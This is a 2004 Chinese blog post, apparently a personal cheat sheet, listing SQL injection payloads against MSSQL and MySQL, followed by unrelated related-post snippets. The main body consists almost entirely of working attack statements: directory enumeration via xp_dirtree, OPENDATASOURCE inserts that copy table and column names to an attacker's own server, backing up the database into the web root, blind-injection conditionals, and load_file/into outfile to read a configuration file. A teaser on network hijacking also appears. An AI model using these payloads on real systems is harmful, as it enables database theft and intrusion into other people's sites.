Some useful techniques in sql injection [个人总结简洁版]

原创 2004年07月16日 16:57:00

1.a.  create table dirs (dir varchar(100),dirid int)
insert dirs exec xp_dirtree '想获取该目录的磁盘'’
declare @dir varchar(500)

-------
b.   set @dir=''
select @dir=@dir+dir+':'+ltrim(str(dirid))+'|' from dirs where dir>@dir
select 1+@dir

------or

alter table dirs add num int identity constraint num primary key

select  top  1 dir from ( select top[1,2,3...] dir,num from dirs) T order by num desc

c. create table tmptable ( name char(200),id int not null)

insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmptable select [name],[id] from sysobjects where xtype='U' --

select *  into [tmpcolumns]from syscolumns where 1=2

insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmpcolumns select name from syscolumns where id=' the id of table you wanna know'

declare @a sysname; set @a=db_name();backup database @a to disk='网站的绝对路径';--// 例如:e:/web/down.bak;--

2.
select top 1 name from (select top 2 name,id from sysobjects where xtype='U') T order by id desc
select top 2 name,id from sysobjects where xtype='U'
select db_id('master')
select db_name(17)

select col_name(oject_id('你要获取字段的表名'),[1,2,..])
select current_user,user,user_name(),system_user

DECLARE m  scroll CURSOR FOR
select name from sysobjects where xtype='U'
open m
DEALLOCATE m
fetch first from m

3.http://www.itlearner.com/work/hexsql.asp //a not bad link to encode charset

http://whois.webhosting.info

4.select case 1+1 when 1 then '1' else '0' end;

select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0

select if(STRCMP('net0r','netor1'),'not netor','is netor');

SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile 'c:/web/cfg.txt'

Some useful techniques in hijacking

1.HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters/,将IPEnableRouter的值改为16进制的1,这...
  • net0r
  • net0r
  • 2004年07月27日 20:32
  • 1052

执行umount 的时候却提示:device is busy 的处理方法

[root@web2-server yum.repos.d]# umount /mnt/cdrom/ umount: /mnt/cdrom: device is busy. (In some ca...
  • lengyue1084
  • lengyue1084
  • 2016年05月22日 23:31
  • 5957

简单的自我总结

2014-2016年 技术经理/产品研发,发布/PMP,敏捷开发,CMMI 2012-2014年 Leader/社交网络,推送,关注/PHP,MYSQL,node.js 2010-2012年 高级...
  • qinzhihu
  • qinzhihu
  • 2016年02月29日 17:31
  • 1033

数据库个人总结

--新建用户 create user aaa identified by "123"; --授予权限 grant connect,resource to aaa; --创建表 ...
  • weixin_38057515
  • weixin_38057515
  • 2017年06月28日 10:21
  • 291

SQL Injection(三)――Blind Injection

  作者:余正洋上次说到了简单的过滤单引号的危险性。还有一种情况,由于基本的SQL Injection的前提是有Detail的Error Message,通过输入一些注入语句后观察这些错误信息,而后判...
  • rogeryu
  • rogeryu
  • 2006年12月20日 11:10
  • 3673

SQL Syntax - Some Useful Keywords

1. SELECT TOP Clause --TOP used to specify the number of records to return,SQL SERVER SELECT TOP nu...
  • wbing520
  • wbing520
  • 2014年04月11日 01:07
  • 501

Blind SQL Injection

https://www.owasp.org/index.php/Blind_SQL_Injection Description Blind SQL (Structured Query Languag...
  • kezhen
  • kezhen
  • 2014年03月24日 21:43
  • 2885

mount/umount命令基础专题

重点参考链接mount/umount命令详解http://blog.csdn.net/wlxtaking/article/details/5901754详细介绍Linux mount命令使用http:...
  • junbaozi
  • junbaozi
  • 2018年01月18日 00:25
  • 20

SQL全书总结——简洁版

SQL全书总结——简洁版首先,献上小编的思维导图一张 我把这本书分为三大部分:是什么?(WHAT) 怎么做?(HOW) 操作都有哪些:创建 更改 删除 ——数据 /表/视图 剩下就是贯穿全...
  • lj251948
  • lj251948
  • 2017年11月27日 21:24
  • 44

sql 值得学习的语句(个人总结)

好久没写博客了, 都忙晕了,,,, 今天总结了一些sql语句,比较少,但个人觉得比较有用。 1.填充字符串,不足左补0 replicate('0', 3 - len(isnull...
  • chr23899
  • chr23899
  • 2015年01月19日 11:48
  • 674
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Some useful techniques in sql injection [个人总结简洁版]
举报原因:
原因补充:

(最多只允许输入30个字)